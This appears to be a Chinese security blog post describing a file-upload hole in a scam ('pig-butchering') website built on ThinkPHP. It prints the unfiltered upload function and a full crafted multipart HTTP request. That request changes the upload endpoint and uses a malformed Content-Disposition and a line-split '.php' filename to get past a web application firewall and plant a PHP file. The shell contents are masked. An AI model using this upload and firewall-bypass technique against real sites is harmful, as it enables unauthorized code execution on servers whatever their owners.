某杀猪盘文件上传漏洞

彦祖 204

序言

这套程序是今年比较流行的,当时碰到的是基于thinkphp3.2.3的。可惜没有找到这种类型的了,后面我在一个受害群看到了这套系统,基于tp5修改的。相似很高。
贴出前台与后台的图片

Part1

首先先注册一个账号登陆
头像上传
POST /home/mine/upload_head.html
改为
POST /home/mine/upload_one.html

 public function upload_one(){
        $file = request()->file('file');
        if(empty($file)){
            $data = array("status" =>0,"error" => '请选择上传图片');
            return json($data);

        }
        $path = ROOT_PATH . 'public' . DS . 'uploads'. DS .'cate_img';
        $info = $file->move($path);
        if($info){
            $picd = 'cate_img/'.$info->getSaveName();
            $pic = Config::get('img_url').$picd;
            $data = array("status" =>1,"pic" => $pic,'picd'=>$picd);
            return json($data);
        }else{
            $data = array("status" =>0,"error" => '上传图片失败');
            return json($data);
        }
    }

    /**
     * 上传一张图片CK
     */
    public function upload_one_ck(){
        $cb = $_GET['CKEditorFuncNum']; //获得ck的回调id
        try {
            if(isset($_FILES['upload'])) { //上传的图片的信息存在$_FILES['upload']
                $file = request()->file('upload');
                if(!$file){
                    throw new Exception("上传文件不存在");
                }
                $path = ROOT_PATH . 'public' . DS . 'uploads'. DS .'ck_img';
                $info = $file->move($path);
                if($info) {
                    $picd = 'ck_img/' . $info->getSaveName();
                    $pic = Config::get('img_url') . $picd;
                    echo "<script>window.parent.CKEDITOR.tools.callFunction($cb, '$pic', '');</script>" ;
                }
            }
        }catch (\Exception $e) {
            $erro = $e->getMessage();
            echo "<script>window.parent.CKEDITOR.tools.callFunction($cb, '', '$erro');</script>" ;//图片上传失败,通知ck失败消息
        }
    }

未过滤

如果被拦截 改为

POST /home/mine/upload_one.html  HTTP/1.1
Host: xx
Content-Length: 373
Origin: http://xxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.81 Safari/537.36 SE 2.X MetaSr 1.0
DNT: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0I41hhHscVa1LDAl
Accept: */*
Referer: http://xx/home/mine/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=
Connection: close

------WebKitFormBoundary0I41hhHscVa1LDAl
Content-Disposition: form-data; name="name"

avatar.jpg
------WebKitFormBoundary0I41hhHscVa1LDAl
Content-Disposition: form+data; name="file";  filename="avatar.jpg
A.php"
Content-Type: image/png

GIF89a
XXXXXXX
------WebKitFormBoundary0I41hhHscVa1LDAl--

分享